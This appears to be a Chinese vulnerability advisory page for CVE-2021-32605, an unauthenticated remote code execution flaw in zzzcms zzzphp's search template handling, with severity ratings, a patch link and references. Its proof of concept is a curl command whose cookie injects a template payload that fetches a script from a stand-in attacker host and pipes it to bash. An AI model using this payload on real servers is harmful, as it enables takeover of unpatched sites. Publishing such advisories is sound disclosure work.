zzzcms zzzphp parserIfLabel模板注入远程执行代码漏洞
CVE编号
CVE-2021-32605利用情况
暂无补丁情况
N/A披露时间
2021-05-11漏洞描述
此漏洞使远程攻击者可以在受影响的zzzphp安装上执行任意代码。利用此漏洞不需要身份验证。 特定缺陷存在于搜索模板的处理中。此问题是由于在处理搜索模板时,缺乏对用户提供的键的正确验证所致。攻击者可以利用此漏洞在Web服务器的上下文中执行代码。 PoC: curl -b 'keys={if:=`curl http://attacker.tld/poc.sh|bash`}{end if}' 'http://target.tld/?location=search'解决建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:http://www.zzzcms.com/a/news/31_282_1.html
参考链接 |
|
---|---|
http://www.zzzcms.com/a/news/31_282_1.html | |
https://nvd.nist.gov/vuln/detail/CVE-2021-32605 | |
https://srcincite.io/advisories/src-2021-0015/ |
受影响软件情况
# | 类型 | 厂商 | 产品 | 版本 | 影响面 | ||||
1 | |||||||||
---|---|---|---|---|---|---|---|---|---|
运行在以下环境 | |||||||||
应用 | zzzcms | zzzphp | * | Up to (excluding) 2.0.4 |
- 攻击路径 网络
- 攻击复杂度 低
- 权限要求 无
- 影响范围 未更改
- 用户交互 无
- 可用性 高
- 保密性 高
- 完整性 高
CWE-ID | 漏洞类型 |
CWE-78 | OS命令中使用的特殊元素转义处理不恰当(OS命令注入) |
Exp相关链接

版权声明
本站原创文章转载请注明文章出处及链接,谢谢合作!
评论